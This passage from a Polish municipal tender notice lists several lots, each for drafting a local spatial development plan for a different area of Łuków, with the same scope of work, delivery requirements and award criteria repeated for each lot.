1.	Przedmiot zamówienia należy wykonać zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.) oraz  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587).
2.	Wymagana skala projektu miejscowego planu zagospodarowania przestrzennego 1: 1000. 
3.	Zakres prac obejmuje: 
- wykonanie inwentaryzacji urbanistycznej,
- analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia, 
- przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia  planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
- sporządzenie projektu planu wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia planu, 
- prezentacja koncepcji planu władzom gminy,
- uzyskanie niezbędnych opinii i uzgodnień do projektu planu, 
- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu  planu wraz z  prognozą oddziaływania na środowisko do publicznego wglądu, 
- udział w wyznaczonych przez zamawiającego co najmniej 3 dyżurach planistycznych w ramach dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu i w prognozie oddziaływania na środowisko, 
- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, 
- wprowadzenie zmian w projekcie planu wynikających z rozpatrzenia ewentualnych uwag, 
- ewentualne ponowne uzgodnienie projektu  planu w niezbędnych  zakresach, 
- przygotowanie projektu uchwały wraz z uzasadnieniem w sprawie przyjęcia projektu planu wraz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Miasta Łuków,
- przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących planu wraz z załącznikami w celu oceny ich zgodności z przepisami prawnymi przez Wojewodę. 
4.	Do czasu stwierdzenia przez Wojewodę zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia planu należą do Wykonawcy.
5.	Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem rzeczowo-finansowo-terminowym dotyczącym opracowania projektu miejscowego planu  zagospodarowania przestrzennego. 
6.	Wykonawcę zobowiązuje się do przygotowania kompletu dokumentów, wykazów, pism i zawiadomień wynikających z trybu opracowania planu, udziału Wykonawcy w posiedzeniach zorganizowanych dla wszystkich komisji Rady Miasta Łuków oraz sesjach Rady Miasta Łuków poświęconych pracom nad planem, przygotowaniem projektów pism, zawiadomień i uchwał wraz z uzasadnieniem w przypadku uwag do zmiany planu, skompletowania dokumentacji formalno-prawnej do przedłożenia w Lubelskim Urzędzie Wojewódzkim.
7.	Opracowania muszą zawierać część tekstową i graficzną uwzględniającą określenia wyszczególnione odpowiednio w art. 15  z uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym. 
8.	Przedmiot zamówienia należy wykonać:
a)	techniką tradycyjną wraz z zapisem na płycie CD/DVD niezabezpieczonej przed kopiowaniem (standard plików .doc, .pdf, .xls),
b)	w wersji cyfrowej umożliwiającej jej prawidłowe odczytanie przez program służący do zakładania i prowadzenia mapy wektorowej. 
UWAGA: Wersja cyfrowa musi umożliwić jej prawidłowe odczytanie przez program EWMAPA (wizualizacja danych) jak również część opisową przez moduł WINPLAN służący do zakładania, bieżącego prowadzenia oraz aktualizacji części opisowej planu zagospodarowania przestrzennego. Zamawiający posiada licencję do programu EWMAPA v.8.0. Wykonawca zainstaluje wersję elektroniczną na 4 stanowiskach komputerowych wskazanych przez Zamawiającego.
9.	 Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: Dokumenty dot. miejscowego planu zagospodarowania przestrzennego należy wykonać w następujących ilościach:
a)	wersja papierowa:
- tekst planu - 8 egz. oprawionych,
- rysunek planu w skali 1:1000 - 2 egz., 
- rysunek planu pomniejszony czarno-biały do publikacji - 2 egz. w tym 1 pocięty,
- rysunek planu pomniejszony kolorowy - 6 egz.,
- prognoza oddziaływania na środowisko - 3 egz. oprawione,
- prognoza skutków finansowych uchwalenia planu - 3 egz. oprawione; 
b)	2 płyty CD/DVD z zapisem niezabezpieczone przed kopiowaniem (standard plików .doc, .pdf, .xls) zawierające:
- tekst planu, prognozę oddziaływania na środowisko, prognozę skutków finansowych uchwalenia planu,
- rysunek planu w skali 1:1000, 
- rysunek planu pomniejszony czarno-biały do publikacji,
- rysunek planu pomniejszony kolorowy;
c)	wersja cyfrowa - 2 płyty CD/DVD.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia.
W przypadku gdyby wykonawca uznał, że zamawiający zawarł w opisie przedmiotu zamówienia wskazanie znaków towarowych, patentów lub pochodzenia zamawiający dopuszcza składanie ofert na wyspecyfikowane przedmioty - lub równoważne. Za równoważne zamawiający rozumie takie opracowanie wersji cyfrowej planu, której standard i rozszerzenia plików umożliwia prawidłową konwersję oraz odczytanie przez oprogramowanie do którego zamawiający posiada licencję..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 003 <b>NAZWA:</b> Wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony wschodniej, ul. Cieszkowizna, ul. Partyzantów, ul. Doktora Andrzeja Rogalińskiego, ul. Warszawską, terenem PKP o pow. ok. 626 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony wschodniej, ul. Cieszkowizna, ul. Partyzantów, ul. Doktora Andrzeja Rogalińskiego, ul. Warszawską, terenem PKP o pow. ok. 626 ha. 
1	Przedmiot zamówienia należy wykonać zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.) oraz  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587).
2	Wymagana skala projektu miejscowego planu zagospodarowania przestrzennego 1: 1000. 
3	Zakres prac obejmuje: 
- wykonanie inwentaryzacji urbanistycznej,
- analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia, 
- przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia  planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
- sporządzenie projektu planu wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia planu, 
- prezentacja koncepcji planu władzom gminy,
- uzyskanie niezbędnych opinii i uzgodnień do projektu planu, 
- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu  planu wraz z  prognozą oddziaływania na środowisko do publicznego wglądu, 
- udział w wyznaczonych przez zamawiającego co najmniej 3 dyżurach planistycznych w ramach dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu i w prognozie oddziaływania na środowisko, 
- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, 
- wprowadzenie zmian w projekcie planu wynikających z rozpatrzenia ewentualnych uwag, 
- ewentualne ponowne uzgodnienie projektu  planu w niezbędnych  zakresach, 
- przygotowanie projektu uchwały wraz z uzasadnieniem w sprawie przyjęcia projektu planu wraz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Miasta Łuków,
- przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących planu wraz z załącznikami w celu oceny ich zgodności z przepisami prawnymi przez Wojewodę. 
4	Do czasu stwierdzenia przez Wojewodę zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia planu należą do Wykonawcy.
5	Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem rzeczowo-finansowo-terminowym dotyczącym opracowania projektu miejscowego planu  zagospodarowania przestrzennego. 
6	Wykonawcę zobowiązuje się do przygotowania kompletu dokumentów, wykazów, pism i zawiadomień wynikających z trybu opracowania planu, udziału Wykonawcy w posiedzeniach zorganizowanych dla wszystkich komisji Rady Miasta Łuków oraz sesjach Rady Miasta Łuków poświęconych pracom nad planem, przygotowaniem projektów pism, zawiadomień i uchwał wraz z uzasadnieniem w przypadku uwag do zmiany planu, skompletowania dokumentacji formalno-prawnej do przedłożenia w Lubelskim Urzędzie Wojewódzkim.
7	Opracowania muszą zawierać część tekstową i graficzną uwzględniającą określenia wyszczególnione odpowiednio w art. 15  z uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym. 
8	Przedmiot zamówienia należy wykonać:
a)	techniką tradycyjną wraz z zapisem na płycie CD/DVD niezabezpieczonej przed kopiowaniem (standard plików .doc, .pdf, .xls),
b)	w wersji cyfrowej umożliwiającej jej prawidłowe odczytanie przez program służący do zakładania i prowadzenia mapy wektorowej. 
UWAGA: Wersja cyfrowa musi umożliwić jej prawidłowe odczytanie przez program EWMAPA (wizualizacja danych) jak również część opisową przez moduł WINPLAN służący do zakładania, bieżącego prowadzenia oraz aktualizacji części opisowej planu zagospodarowania przestrzennego. Zamawiający posiada licencję do programu EWMAPA v.8.0. Wykonawca zainstaluje wersję elektroniczną na 4 stanowiskach komputerowych wskazanych przez Zamawiającego.
9)	 Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: Dokumenty dot. miejscowego planu zagospodarowania przestrzennego należy wykonać w następujących ilościach:
a)	wersja papierowa:
- tekst planu - 8 egz. oprawionych,
- rysunek planu w skali 1:1000 - 2 egz., 
- rysunek planu pomniejszony czarno-biały do publikacji - 2 egz. w tym 1 pocięty,
- rysunek planu pomniejszony kolorowy - 6 egz.,
- prognoza oddziaływania na środowisko - 3 egz. oprawione,
- prognoza skutków finansowych uchwalenia planu - 3 egz. oprawione; 
b)	2 płyty CD/DVD z zapisem niezabezpieczone przed kopiowaniem (standard plików .doc, .pdf, .xls) zawierające:
- tekst planu, prognozę oddziaływania na środowisko, prognozę skutków finansowych uchwalenia planu,
- rysunek planu w skali 1:1000, 
- rysunek planu pomniejszony czarno-biały do publikacji,
- rysunek planu pomniejszony kolorowy;
c)	wersja cyfrowa - 2 płyty CD/DVD.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia.
W przypadku gdyby wykonawca uznał, że zamawiający zawarł w opisie przedmiotu zamówienia wskazanie znaków towarowych, patentów lub pochodzenia zamawiający dopuszcza składanie ofert na wyspecyfikowane przedmioty - lub równoważne. Za równoważne zamawiający rozumie takie opracowanie wersji cyfrowej planu, której standard i rozszerzenia plików umożliwia prawidłową konwersję oraz odczytanie przez oprogramowanie do którego zamawiający posiada licencję..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 004 <b>NAZWA:</b> Wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowo-wschodniej, ul. Świderską, ul. 700-lecia, ul. Partyzantów i ul. Cieszkowizna o pow. ok. 655 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowo-wschodniej, ul. Świderską, ul. 700-lecia, ul. Partyzantów i ul. Cieszkowizna o pow. ok. 655 ha. 
1.	Przedmiot zamówienia należy wykonać zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.) oraz  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587).
2.	Wymagana skala projektu miejscowego planu zagospodarowania przestrzennego 1: 1000. 
3.	Zakres prac obejmuje: 
- wykonanie inwentaryzacji urbanistycznej,
- analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia, 
- przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia  planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
- sporządzenie projektu planu wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia planu, 
-prezentacja koncepcji planu władzom gminy,
- uzyskanie niezbędnych opinii i uzgodnień do projektu planu, 
- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu  planu wraz z  prognozą oddziaływania na środowisko do publicznego wglądu, 
- udział w wyznaczonych przez zamawiającego co najmniej 3 dyżurach planistycznych w ramach dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu i w prognozie oddziaływania na środowisko, 
- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, 
- wprowadzenie zmian w projekcie planu wynikających z rozpatrzenia ewentualnych uwag, 
- ewentualne ponowne uzgodnienie projektu  planu w niezbędnych  zakresach, 
- przygotowanie projektu uchwały wraz z uzasadnieniem w sprawie przyjęcia projektu planu wraz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Miasta Łuków,
- przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących planu wraz z załącznikami w celu oceny ich zgodności z przepisami prawnymi przez Wojewodę. 
4.	Do czasu stwierdzenia przez Wojewodę zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia planu należą do Wykonawcy.
5.	Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem rzeczowo-finansowo-terminowym dotyczącym opracowania projektu miejscowego planu  zagospodarowania przestrzennego. 
6.	Wykonawcę zobowiązuje się do przygotowania kompletu dokumentów, wykazów, pism i zawiadomień wynikających z trybu opracowania planu, udziału Wykonawcy w posiedzeniach zorganizowanych dla wszystkich komisji Rady Miasta Łuków oraz sesjach Rady Miasta Łuków poświęconych pracom nad planem, przygotowaniem projektów pism, zawiadomień i uchwał wraz z uzasadnieniem w przypadku uwag do zmiany planu, skompletowania dokumentacji formalno-prawnej do przedłożenia w Lubelskim Urzędzie Wojewódzkim.
7.	Opracowania muszą zawierać część tekstową i graficzną uwzględniającą określenia wyszczególnione odpowiednio w art. 15 z uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym. 
8.	Przedmiot zamówienia należy wykonać:
a)	techniką tradycyjną wraz z zapisem na płycie CD/DVD niezabezpieczonej przed kopiowaniem (standard plików .doc, .pdf, .xls),
b)	w wersji cyfrowej umożliwiającej jej prawidłowe odczytanie przez program służący do zakładania i prowadzenia mapy wektorowej. 
UWAGA: Wersja cyfrowa musi umożliwić jej prawidłowe odczytanie przez program EWMAPA (wizualizacja danych) jak również część opisową przez moduł WINPLAN służący do zakładania, bieżącego prowadzenia oraz aktualizacji części opisowej planu zagospodarowania przestrzennego. Zamawiający posiada licencję do programu EWMAPA v.8.0. Wykonawca zainstaluje wersję elektroniczną na 4 stanowiskach komputerowych wskazanych przez Zamawiającego.
9.	 Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: Dokumenty dot. miejscowego planu zagospodarowania przestrzennego należy wykonać w następujących ilościach:
a)	wersja papierowa:
- tekst planu - 8 egz. oprawionych,
- rysunek planu w skali 1:1000 - 2 egz., 
- rysunek planu pomniejszony czarno-biały do publikacji - 2 egz. w tym 1 pocięty,
- rysunek planu pomniejszony kolorowy - 6 egz.,
- prognoza oddziaływania na środowisko - 3 egz. oprawione,
- prognoza skutków finansowych uchwalenia planu - 3 egz. oprawione; 
b)	2 płyty CD/DVD z zapisem niezabezpieczone przed kopiowaniem (standard plików .doc, .pdf, .xls) zawierające:
- tekst planu, prognozę oddziaływania na środowisko, prognozę skutków finansowych uchwalenia planu,
- rysunek planu w skali 1:1000, 
- rysunek planu pomniejszony czarno-biały do publikacji,
- rysunek planu pomniejszony kolorowy;
c)	wersja cyfrowa - 2 płyty CD/DVD.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia.
W przypadku gdyby wykonawca uznał, że zamawiający zawarł w opisie przedmiotu zamówienia wskazanie znaków towarowych, patentów lub pochodzenia zamawiający dopuszcza składanie ofert na wyspecyfikowane przedmioty - lub równoważne. Za równoważne zamawiający rozumie takie opracowanie wersji cyfrowej planu, której standard i rozszerzenia plików umożliwia prawidłową konwersję oraz odczytanie przez oprogramowanie do którego zamawiający posiada licencję..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 005 <b>NAZWA:</b> Wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowo-zachodniej, ul. Łapiguz i terenem PKP o pow. ok. 330 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony południowo-zachodniej, ul. Łapiguz i terenem PKP o pow. ok. 330 ha. 
1.	Przedmiot zamówienia należy wykonać zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.) oraz  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587).
2.	Wymagana skala projektu miejscowego planu zagospodarowania przestrzennego 1: 1000. 
3.	Zakres prac obejmuje: 
- wykonanie inwentaryzacji urbanistycznej,
- analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia, 
- przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia  planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
- sporządzenie projektu planu wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia planu, 
- prezentacja koncepcji planu władzom gminy,
- uzyskanie niezbędnych opinii i uzgodnień do projektu planu, 
- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu  planu wraz z  prognozą oddziaływania na środowisko do publicznego wglądu, 
- udział w wyznaczonych przez zamawiającego co najmniej 3 dyżurach planistycznych w ramach dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu i w prognozie oddziaływania na środowisko, 
- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, 
- wprowadzenie zmian w projekcie planu wynikających z rozpatrzenia ewentualnych uwag, 
- ewentualne ponowne uzgodnienie projektu  planu w niezbędnych  zakresach, 
- przygotowanie projektu uchwały wraz z uzasadnieniem w sprawie przyjęcia projektu planu wraz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Miasta Łuków,
- przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących planu wraz z załącznikami w celu oceny ich zgodności z przepisami prawnymi przez Wojewodę. 
4.	Do czasu stwierdzenia przez Wojewodę zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia planu należą do Wykonawcy.
5.	Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem rzeczowo-finansowo-terminowym dotyczącym opracowania projektu miejscowego planu  zagospodarowania przestrzennego. 
6.	Wykonawcę zobowiązuje się do przygotowania kompletu dokumentów, wykazów, pism i zawiadomień wynikających z trybu opracowania planu, udziału Wykonawcy w posiedzeniach zorganizowanych dla wszystkich komisji Rady Miasta Łuków oraz sesjach Rady Miasta Łuków poświęconych pracom nad planem, przygotowaniem projektów pism, zawiadomień i uchwał wraz z uzasadnieniem w przypadku uwag do zmiany planu, skompletowania dokumentacji formalno-prawnej do przedłożenia w Lubelskim Urzędzie Wojewódzkim.
7.	Opracowania muszą zawierać część tekstową i graficzną uwzględniającą określenia wyszczególnione odpowiednio w art. 15 z uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym. 
8.	Przedmiot zamówienia należy wykonać:
a)	techniką tradycyjną wraz z zapisem na płycie CD/DVD niezabezpieczonej przed kopiowaniem (standard plików .doc, .pdf, .xls),
b)	w wersji cyfrowej umożliwiającej jej prawidłowe odczytanie przez program służący do zakładania i prowadzenia mapy wektorowej. 
UWAGA: Wersja cyfrowa musi umożliwić jej prawidłowe odczytanie przez program EWMAPA (wizualizacja danych) jak również część opisową przez moduł WINPLAN służący do zakładania, bieżącego prowadzenia oraz aktualizacji części opisowej planu zagospodarowania przestrzennego. Zamawiający posiada licencję do programu EWMAPA v.8.0. Wykonawca zainstaluje wersję elektroniczną na 4 stanowiskach komputerowych wskazanych przez Zamawiającego.
9.	 Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: Dokumenty dot. miejscowego planu zagospodarowania przestrzennego należy wykonać w następujących ilościach:
a)	wersja papierowa:
- tekst planu - 8 egz. oprawionych,
- rysunek planu w skali 1:1000 - 2 egz., 
- rysunek planu pomniejszony czarno-biały do publikacji - 2 egz. w tym 1 pocięty,
- rysunek planu pomniejszony kolorowy - 6 egz.,
- prognoza oddziaływania na środowisko - 3 egz. oprawione,
- prognoza skutków finansowych uchwalenia planu - 3 egz. oprawione; 
b)	2 płyty CD/DVD z zapisem niezabezpieczone przed kopiowaniem (standard plików .doc, .pdf, .xls) zawierające:
- tekst planu, prognozę oddziaływania na środowisko, prognozę skutków finansowych uchwalenia planu,
- rysunek planu w skali 1:1000, 
- rysunek planu pomniejszony czarno-biały do publikacji,
- rysunek planu pomniejszony kolorowy;
c)	wersja cyfrowa - 2 płyty CD/DVD.
Szczegółowy opis przedmiotu zamówienia określa specyfikacja istotnych warunków zamówienia.
W przypadku gdyby wykonawca uznał, że zamawiający zawarł w opisie przedmiotu zamówienia wskazanie znaków towarowych, patentów lub pochodzenia zamawiający dopuszcza składanie ofert na wyspecyfikowane przedmioty - lub równoważne. Za równoważne zamawiający rozumie takie opracowanie wersji cyfrowej planu, której standard i rozszerzenia plików umożliwia prawidłową konwersję oraz odczytanie przez oprogramowanie do którego zamawiający posiada licencję..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 006 <b>NAZWA:</b> Wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony północno-wschodniej a terenem PKP o pow. ok. 878 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu miejscowego planu zagospodarowania przestrzennego miasta Łuków oraz udział w czynnościach związanych ze sporządzeniem planu. Projekt obejmuje teren położony w Łukowie pomiędzy granicami administracyjnymi miasta od strony północno-wschodniej a terenem PKP o pow. ok. 878 ha.
1.	Przedmiot zamówienia należy wykonać zgodnie z art. 15 ust. 2 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z późn. zm.) oraz  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003r. Nr 164, poz. 1587).
2.	Wymagana skala projektu miejscowego planu zagospodarowania przestrzennego 1: 1000. 
3.	Zakres prac obejmuje: 
-	wykonanie inwentaryzacji urbanistycznej,
- analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia, 
- przygotowanie zawiadomień na piśmie o przystąpieniu do sporządzenia  planu dla instytucji i organów właściwych do uzgodnienia i opiniowania, 
- sporządzenie projektu planu wraz z prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia planu, 
- prezentacja koncepcji planu władzom gminy,
- uzyskanie niezbędnych opinii i uzgodnień do projektu planu, 
- wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień, 
- przygotowanie ogłoszeń i obwieszczeń o wyłożeniu projektu  planu wraz z  prognozą oddziaływania na środowisko do publicznego wglądu, 
- udział w wyznaczonych przez zamawiającego co najmniej 3 dyżurach planistycznych w ramach dyskusji publicznej nad przyjętymi rozwiązaniami w projekcie planu i w prognozie oddziaływania na środowisko, 
- analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu planu i prognozy oddziaływania na środowisko, 
- wprowadzenie zmian w projekcie planu wynikających z rozpatrzenia ewentualnych uwag, 
- ewentualne ponowne uzgodnienie projektu  planu w niezbędnych  zakresach, 
- przygotowanie projektu uchwały wraz z uzasadnieniem w sprawie przyjęcia projektu planu wraz z listą nieuwzględnionych uwag oraz przedstawienie Radzie Miasta Łuków,
- przekazanie Zamawiającemu kompletnych dokumentacji prac planistycznych dotyczących planu wraz z załącznikami w celu oceny ich zgodności z przepisami prawnymi przez Wojewodę. 
4.	Do czasu stwierdzenia przez Wojewodę zgodności planu z przepisami prawnymi, wszystkie czynności związane z obowiązkiem sporządzenia planu należą do Wykonawcy.
5.	Przedmiot zamówienia należy wykonać etapami zgodnie z Harmonogramem rzeczowo-finansowo-terminowym dotyczącym opracowania projektu miejscowego planu  zagospodarowania przestrzennego. 
6.	Wykonawcę zobowiązuje się do przygotowania kompletu dokumentów, wykazów, pism i zawiadomień wynikających z trybu opracowania planu, udziału Wykonawcy w posiedzeniach zorganizowanych dla wszystkich komisji Rady Miasta Łuków oraz sesjach Rady Miasta Łuków poświęconych pracom nad planem, przygotowaniem projektów pism, zawiadomień i uchwał wraz z uzasadnieniem w przypadku uwag do zmiany planu, skompletowania dokumentacji formalno-prawnej do przedłożenia w Lubelskim Urzędzie Wojewódzkim.
7.	Opracowania muszą zawierać część tekstową i graficzną uwzględniającą określenia wyszczególnione odpowiednio w art. 15 z uwzględnieniem art. 16 ustawy o planowaniu i zagospodarowaniu przestrzennym. 
8.	Przedmiot zamówienia należy wykonać:
a)	techniką tradycyjną wraz z zapisem na płycie CD/DVD niezabezpieczonej przed kopiowaniem (standard plików .doc, .pdf, .xls),
b)	w wersji cyfrowej umożliwiającej jej prawidłowe odczytanie przez program służący do zakładania i prowadzenia mapy wektorowej. 
UWAGA: Wersja cyfrowa musi umożliwić jej prawidłowe odczytanie przez program EWMAPA (wizualizacja danych) jak również część opisową przez moduł WINPLAN służący do zakładania, bieżącego prowadzenia oraz aktualizacji części opisowej planu zagospodarowania przestrzennego. Zamawiający posiada licencję do programu EWMAPA v.8.0. Wykonawca zainstaluje wersję elektroniczną na 4 stanowiskach komputerowych wskazanych przez Zamawiającego.
9.	 Warunki dotyczące dostarczenia dokumentacji dla Zamawiającego: Dokumenty dot. miejscowego planu zagospodarowania przestrzennego należy wykonać w następujących ilościach:
a)	wersja papierowa:
- tekst planu - 8 egz. oprawionych,
- rysunek planu w skali 1:1000 - 2 egz., 
- rysunek planu pomniejszony czarno-biały do publikacji - 2 egz. w tym 1 pocięty,
- rysunek planu pomniejszony kolorowy - 6 egz.,
- prognoza oddziaływania na środowisko - 3 egz. oprawione,
